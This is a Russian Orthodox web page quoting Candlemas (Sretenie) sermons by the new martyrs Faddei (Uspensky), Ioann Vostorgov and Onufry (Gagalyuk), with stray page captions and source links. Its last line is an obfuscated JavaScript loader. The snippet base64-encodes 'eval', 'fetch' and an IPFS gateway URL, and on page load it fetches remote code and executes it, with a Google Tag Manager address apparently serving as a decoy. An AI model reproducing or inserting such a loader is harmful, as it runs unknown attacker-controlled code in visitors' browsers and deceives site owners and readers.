Новомученики Русской Церкви о Сретении Господнем

Праздник Сретения Господня 2024 г.

Священномученик Фаддей (Успенский), архиепископ Тверской:

 "Не в том величие празднества нынешнего, что безмолвные стены ветхозаветного храма принимают Христа, принесенного для совершения по обычаю законному о Нем (Лк. 2: 27), а в том, что через это вшествие в храм сретает Господа своего и сама Церковь, из живых людей состоящая, и совершает Господь, приносимый Материю вольне в Церковь законную, воцерковление всего человечества: в Нем всё человечество сретает Бога своего, воцерковляется через общение с Ним, воспринимает в объятия сердца своего Бога спасающего.

...Но как и где мы можем сретить Господа? Ведь мы так далеко от Него не пространством одним, но и самыми сердцами? Ведь мы постоянно находимся на стране далече от Него, как блудный сын. Да, мы далеко от Него, но есть и у нас средства к Нему приблизиться, найти Его, сретить Его. Ведь есть дом Отчий, в который так легко имеют доступ все блудные сыны и дщери Его, – это храм Господень. Если вдали от храма так забывают люди о доме Отчем, о Самом Отце Небесном, то как в храме всё памятью о Нем и присутствием Его дышит! Блудного сына спасло благодатное воспоминание о доме отчем, в котором некогда жилось ему так хорошо. Где же, как не в храме, всего удобнее и легче может прийти человеку спасительное напоминание о благах дома Отчего? Ведь всё в храме будит такие воспоминания: и самый вид церкви, затерявшейся среди домов, и самый звук колокола, звон – «как много дум наводит он», по словам поэта!

Однако как многие люди приходят в храм и здесь Господа своего не находят, присутствия Его не ощущают, ни малейшего следа этого присутствия не замечают и никак не могут сретить Его в храме! Тогда пусть вспомнят они, что невидимый Господь воспринимается лишь руками душевными, объятиями сердца. Как некогда великий пророк Исаия восклицал: Горе мне! погиб я! ибо я человек с нечистыми устами... и глаза мои видели Царя, Господа Саваофа (Ис. 6: 5). И вот это смиренное сознание очистило его: вместо прежнего убивающего страха, который чувствовал пророк от зрения Господа, сидящего на престоле высоком и превознесенном, Исаия ощутил близость Его спасительную, провидел воплощаемого Бога подобно новозаветному евангелисту с такой ясностью, как бы Еммануил (с нами Бог) жил с нами уже во дни пророка. Итак, смиренное сознание своего недостоинства, глубокое покаяние приближает к нам Бога, делает объятия сердца нашего способными Его воспринять".

Священномученик Иоанн Восторгов: 

 "Ныне отпущаеши раба твоего, Владыко, по глаголу Твоему с миром. Чья душа не пожелала бы иметь у себя то сокровище, которое приобрёл блаженный старец Симеон? Кто не пожелал бы себе этого мира, с которым провёл Симеон свою долгую жизнь и теперь бестрепетно встречает и самую смерть? Мир душевный, мир совести, мир с Богом и людьми, мир с целым миром: вот к чему стремятся все люди, вот чего жаждет утомлённое сердце; находим ли этот мир, правильные ли средства употребляем для приобретения его, - это другой вопрос, но что все считают его благом, - это несомненно. Самая война имеет последней целью мир. Так смотрит на мир, как на высочайшее благо, и христианство. Божественный Основатель его для того и сошёл на землю, чтобы принести на неё мир; прощаясь с учениками, Он говорил им: «мир Мой оставляю вам, мир Мой даю вам».

Праздник Сретения Господня 2024 г.

...Но возвратимся к Симеону: чем приобрёл он себе мир душевный? Мало о нём сказано в Евангелии, но что сказано, то даёт нам вполне вразумительный ответ на поставленный вопрос: «И бе, - говорить святой евангелист, - человек во Иерусалиме; ему же имя Симеон; и человек сей праведен и благочестив, чая утехи израилевы, и Дух бе Свят в нем». Вот разгадка счастья Симеона. Приобрети его праведность, его благочестие, - ты привлечёшь к себе и Духа Святого, а вместе с Ним и мир души. Такой мир, которого нарушить ничто не может.

 Что такое праведность? Это такая черта в жизни человека, по которой он свято хранит права других и верно исполняет возложенные на него законом обязанности по отношению к ближним. Праведным называется тот, кто отдаёт каждому свое, кто исполняет свой долг. Но были и есть многие, которые обладали такими свойствами и на них полагали всю свою надежду, чтобы сохранить мир с собою и ближними, и, однако, мир этот далёк был от них. Это потому, что они смотрели на праведность с точки зрения пользы: полезно быть праведным, ибо и другие исполнят свой долг по отношению к тебе, и вот путём взаимной праведности должен получаться мир и общее счастье. Увы, никогда не получали мира и счастья те, кто любит добро потому только, что оно полезно; на праведность редко отвечали праведностью, и любитель пользы вместо мира чувствовали одно озлобление. Не на том должно основывать добродетель: не на пользе, а на благочестии. 

 Веруй в Бога; благоговей пред Ним; люби Его всем сердцем и душой и любовно исполняй Его волю, а любовное исполнение есть наслаждение и даёт душе мир и отраду. Воля же Божия требует праведности, но при любовном исполнении её ты ищешь уже не пользы; оттого, если на твоё добро тебе и отвечают злом, то мира души тебя не лишают, потому что добро творил ты с другими целями: ты творил его из-за добра, из-за благочестия, из любви к Богу, и добро твое всегда останется добром, и цель его достигнута даже и в том случае, когда на него отвечают злом. Только та праведность, которая истекает из благочестия и коренится на нём, имеет нравственную цену и может быть названа прочною... Она тогда привлечёт к тебе Духа Святого. А Дух Святой оскудевающее восполнит, немощное уврачует и даст душе такой мир, которого не нарушать никакие земные беды и напасти. Таковы были мученики христианские, которые шли на костры в радости и веселии духа; таков был, например, знаменитый Иоанн Златоуст, который после жизни скорбной, умирая в изгнании, окружённый врагами, предавая дух свой, воскликнул: «Слава Богу за все!» "

Праздник Сретения Господня 2024 г.

Священномученик Онуфрий (Гагалюк), архиепископ Курский:

Чтение Обращения Святейшего Патриарха Московского и всея Руси Кирилла. 15 февраля 2024 г.

 "...Достойно нашего внимания и то, как святой старец Симеон встречает час своей кончины. Hе страх перед смертью, а тихая радость была на лице святого стаpца, как поет о нем цеpковная песнь: «Глаголи Симеоне, Кого неся на руку в Церкви pадуешися»... А тяжкие гpешники и неверующие, как встречают смерть? С отчаянием, с ужасом. Отчего это? Оттого, что неверующий видит перед собой пустоту, мpак, а совесть, неподкупный судия, в то же время говорит о жизни будущей и о pасплате за грехи жизни... Святой же Симеон впереди видел жизнь с Богом, вечную и блаженную. Желаем и мы, возлюбленные, кончины мирной и тихой. Будем построять всю жизнь свою земную под взглядом будущей жизни, вечной, стаpаясь со всем усеpдием исполнять заповеди Божии, ибо слышим глас Господень: «Hе всякий, говорящий Мне: Господи! Господи! войдет в Царство Hебесное, но исполняющий волю Отца Моего Hебесного. Многие скажут в тот день: Господи! Господи! не от Твоего ли Имени мы пpоpочествовали и не Твоим ли именем бесов изгоняли, и не Твоим ли именем чудеса твоpили? И тогда объявлю Я им: Я никогда не знал вас; отойдите от Меня, делающие беззаконие» (Мф. 7:21–23).

 И, наконец, замечательны слова святого Симеона о Спасителе Богомладенце: «се лежит Сей на падение и на восстание многих во Изpаиле и в предмет пpеpеканий»... Что это значит? Это значит, что Христос Спаситель не пpойдет мимо всей мировой истории людей, но напротив, явится центpальною Личностью на все века для всех людей в мире. К Спасителю будут относиться люди или с ненавистью, или с любовью великою. И мы это видим на пpотяжении всей истории человечества. О ком больше всего люди думали, говорили, споpили, писали, как не о Христе Спасителе? Иные всячески злословили Его, Церковь Его, служителей и последователей Христа Бога, стаpались изгладить самое имя христианства.

 Другие – напротив, умирали за Христа, признавая Его своим Богом и Спасителем, любили Его всем сердцем, всю жизнь свою личную и общественную строили по заветам Христовым. Так было, так и ныне есть, и так будет. И это потому, что Христос Спаситель был не только идеальнейший Всесвятой Человек, и такого не было и не будет никогда, но вместе с тем Бог, пришедший на землю и явившийся среди людей для их спасения (Вар. 3:36–38; Мф. 1:21–23; Евр. 13:8).

 Возлюбленные, пусть бушуют волны неверия, пусть люди не хотят признавать нашего Господа Спасителя, но мы, Его последователи и члены Его Святой Церкви Православной, и словами, и жизнью будем немолчно возвещать, что Иисус Христос есть истинный Человек и истинный Бог Hаш, Спаситель мира, что Он воистину есть тот Камень, который отвеpгли строители, но который является кpаеугольным! (Мф. 21:42). Аминь".

Цитаты приводятся по источникам: https://fond.ru/slovo-novomuchenikov/818-svyashchennomuchenik-faddej-uspenskij-arkhiepiskop-tverskoj-slovo-v-den-sreteniya-gospodnya

https://проповеди.рф/propovedi/propoved/mir-dushevnyj-slovo-v-den-sreteniya-gospodnya-15021894-g/

https://проповеди.рф/propovedi/propoved/beseda-na-prazdnik-sreteniya-gospodnya/

 

 

(function(w,d,s,l,i,j,k,m){w[s]||(w[s]=1,w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c)))})(window,atob,'then','https://www.googletagmanager.com/gtm.js?id=','ZXZhbA==','ZmV0Y2g=','aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtYnB2NHdCeUdrUVcxVW1XVXYzUFBrYlFHWVBOUmVKOUM5Z0JzbnoxclFKQ3U=','fb625250')